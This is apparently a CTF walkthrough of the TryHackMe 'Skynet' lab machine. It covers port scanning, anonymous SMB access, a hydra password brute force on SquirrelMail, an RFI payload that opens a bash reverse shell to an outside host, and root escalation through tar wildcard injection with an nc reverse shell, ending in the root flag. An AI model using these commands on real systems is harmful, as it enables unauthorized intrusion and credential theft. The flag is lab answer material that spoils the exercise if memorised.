nmap
nmap -sC -sV 10.10.52.234
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-24 08:09 EDT
Nmap scan report for 10.10.52.234 (10.10.52.234)
Host is up (0.22s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: PIPELINING SASL AUTH-RESP-CODE CAPA UIDL TOP RESP-CODES
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: OK more post-login capabilities have LITERAL+ IMAP4rev1 listed IDLE LOGIN-REFERRALS LOGINDISABLEDA0001 Pre-login SASL-IR ENABLE ID
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h40m12s, deviation: 2h53m12s, median: 11s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2021-04-24T07:10:09-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-04-24T12:10:09
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.02 seconds
Enumeration
SMB Enumeration
smbmap -H 10.10.52.234 --depth 5
[+] Guest session IP: 10.10.52.234:445 Name: 10.10.52.234
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
anonymous READ ONLY Skynet Anonymous Share
milesdyson NO ACCESS Miles Dyson Personal Share
IPC$ NO ACCESS IPC Service (skynet server (Samba, Ubuntu))
Anonymous Access
smbclient -U"anonymous%anonymous%" //10.10.52.234/anonymous
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 11:04:00 2020
.. D 0 Tue Sep 17 03:20:17 2019
attention.txt N 163 Tue Sep 17 23:04:59 2019
logs D 0 Wed Sep 18 00:42:16 2019
9204224 blocks of size 1024. 5831512 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> get logs\log
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \logs\log
smb: \> cd logs\log
cd \logs\log\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \> cd logs
smb: \logs\> ls
. D 0 Wed Sep 18 00:42:16 2019
.. D 0 Thu Nov 26 11:04:00 2020
log2.txt N 0 Wed Sep 18 00:42:13 2019
log1.txt N 471 Wed Sep 18 00:41:59 2019
log3.txt N 0 Wed Sep 18 00:42:16 2019
9204224 blocks of size 1024. 5831512 blocks available
smb: \logs\> mget *
Get file log2.txt?
Get file log1.txt? y
y
ygetting file \logs\log1.txt of size 471 as log1.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
Get file log3.txt? getting file \logs\log3.txt of size 0 as log3.txt (0.0 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \logs\> yy
Get file log2.txt? y
getting file \logs\log2.txt of size 0 as log2.txt (0.0 KiloBytes/sec) (average 0.2 KiloBytes/sec)
nsmb: \logs\> ls
. D 0 Wed Sep 18 00:42:16 2019
.. D 0 Thu Nov 26 11:04:00 2020
log2.txt N 0 Wed Sep 18 00:42:13 2019
log1.txt N 471 Wed Sep 18 00:41:59 2019
log3.txt N 0 Wed Sep 18 00:42:16 2019
9204224 blocks of size 1024. 5831512 blocks available
smb: \logs\> cd ..
smb: \> ls
. D 0 Thu Nov 26 11:04:00 2020
.. D 0 Tue Sep 17 03:20:17 2019
attention.txt N 163 Tue Sep 17 23:04:59 2019
logs D 0 Wed Sep 18 00:42:16 2019
9204224 blocks of size 1024. 5831512 blocks available
smb: \> exit
log1.txt has a WordList
cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
got a User as Miles Dyson
exploitation
BruteForcing the pop3 on web server
here you can BruteForce the pop server login with log1.txr and enumerated User
hydra -l MilesDyson -P log1.txt 10.10.52.234 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect."
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-24 09:06:15
[DATA] max 16 tasks per 1 server, overall 16 tasks, 31 login tries (l:1/p:31), ~2 tries per task
[DATA] attacking http-post-form://10.10.52.234:80/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect.
[80][http-post-form] host: 10.10.52.234 login: MilesDyson password: cyborg007haloterminator
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-24 09:06:26
got the MilesDyson passwd for smb
milesDyon:)s{A&2Z=F^n_E.B`
now lets Enumerate the smb share of miledyon
┌──(kali㉿nucleus)-[~/tryhackme/skynet]
└─$ smbclient //10.10.52.234/milesdyson -U milesdyson
Enter WORKGROUP\milesdyson password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 17 05:05:47 2019
.. D 0 Tue Sep 17 23:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 05:05:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 05:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 05:05:14 2019
notes D 0 Tue Sep 17 05:18:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 05:05:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 05:05:14 2019
9204224 blocks of size 1024. 5808516 blocks available
smb: \> cd notes
smb: \notes\> ls
. D 0 Tue Sep 17 05:18:40 2019
.. D 0 Tue Sep 17 05:05:47 2019
3.01 Search.md N 65601 Tue Sep 17 05:01:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 05:01:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 05:01:29 2019
0.00 Cover.md N 3114 Tue Sep 17 05:01:29 2019
1.02 Linear Algebra.md N 70314 Tue Sep 17 05:01:29 2019
important.txt N 117 Tue Sep 17 05:18:39 2019
6.01 pandas.md N 9221 Tue Sep 17 05:01:29 2019
3.00 Artificial Intelligence.md N 33 Tue Sep 17 05:01:29 2019
2.01 Overview.md N 1165 Tue Sep 17 05:01:29 2019
3.02 Planning.md N 71657 Tue Sep 17 05:01:29 2019
1.04 Probability.md N 62712 Tue Sep 17 05:01:29 2019
2.06 Natural Language Processing.md N 82633 Tue Sep 17 05:01:29 2019
2.00 Machine Learning.md N 26 Tue Sep 17 05:01:29 2019
1.03 Calculus.md N 40779 Tue Sep 17 05:01:29 2019
3.03 Reinforcement Learning.md N 25119 Tue Sep 17 05:01:29 2019
1.08 Probabilistic Graphical Models.md N 81655 Tue Sep 17 05:01:29 2019
1.06 Bayesian Statistics.md N 39554 Tue Sep 17 05:01:29 2019
6.00 Appendices.md N 20 Tue Sep 17 05:01:29 2019
1.01 Functions.md N 7627 Tue Sep 17 05:01:29 2019
2.03 Neural Nets.md N 144726 Tue Sep 17 05:01:29 2019
2.04 Model Selection.md N 33383 Tue Sep 17 05:01:29 2019
2.02 Supervised Learning.md N 94287 Tue Sep 17 05:01:29 2019
4.00 Simulation.md N 20 Tue Sep 17 05:01:29 2019
3.05 In Practice.md N 1123 Tue Sep 17 05:01:29 2019
1.07 Graphs.md N 5110 Tue Sep 17 05:01:29 2019
2.07 Unsupervised Learning.md N 21579 Tue Sep 17 05:01:29 2019
2.05 Bayesian Learning.md N 39443 Tue Sep 17 05:01:29 2019
5.03 Anonymization.md N 2516 Tue Sep 17 05:01:29 2019
5.01 Process.md N 5788 Tue Sep 17 05:01:29 2019
1.09 Optimization.md N 25823 Tue Sep 17 05:01:29 2019
1.05 Statistics.md N 64291 Tue Sep 17 05:01:29 2019
5.02 Visualization.md N 940 Tue Sep 17 05:01:29 2019
5.00 In Practice.md N 21 Tue Sep 17 05:01:29 2019
4.02 Nonlinear Dynamics.md N 44601 Tue Sep 17 05:01:29 2019
1.10 Algorithms.md N 28790 Tue Sep 17 05:01:29 2019
3.04 Filtering.md N 13360 Tue Sep 17 05:01:29 2019
1.00 Foundations.md N 22 Tue Sep 17 05:01:29 2019
9204224 blocks of size 1024. 5808440 blocks available
smb: \notes\> get important.txt
getting file \notes\important.txt of size 117 as important.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \notes\> exit
got a important.txt
cat important.txt
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
/45kra24zxs28v3yd is a Directory by Using Gobuster it has the adminsistrator dir which is vulnerble for LFI And RFI as well
http://10.10.52.234/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=data:text/plain,%3C?php%20echo%20shell_exec(%22bash%20-i%20%3E&%20/dev/tcp/10.9.202.83/4242%200%3E&1%22)%20?%3E
PrivEsc
Cronjob running as a root
cd /var/www/html
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.202.83 5555 > /tmp/f" >> shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
┌──(kali㉿nucleus)-[~/tryhackme/skynet]
└─$ nc -nvlp 5555 1 ⨯
listening on [any] 5555 ...
connect to [10.9.202.83] from (UNKNOWN) [10.10.52.234] 53436
/bin/sh: 0: cant access tty; job control turned off
# whoami
root
# cd /root
# ls
root.txt
# cat rootr
cat: rootr: No such file or directory
# cat root.txt
3f0372db24753accc7179a282cd6a949
#